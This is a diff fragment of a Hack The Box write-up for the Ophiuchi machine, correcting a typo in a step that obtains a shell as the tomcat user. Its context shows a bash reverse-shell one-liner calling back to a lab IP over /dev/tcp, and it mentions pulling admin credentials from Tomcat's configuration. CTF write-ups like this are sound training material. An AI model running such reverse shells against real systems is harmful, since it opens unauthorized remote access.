corporalcat/HTB-writeups/Ophiuchi/index.md

 bash -i >& /dev/tcp/10.10.14.66/7777 0>&1
 ```

-Setup a listener, send the payload and gota shell as the tomcat user.
+Setup a listener, send the payload and got a shell as the tomcat user.
 ![](tomcatshell.png)

 Next I try looking through the conf directory in tomcat's home directory and got a credentials for the user admin.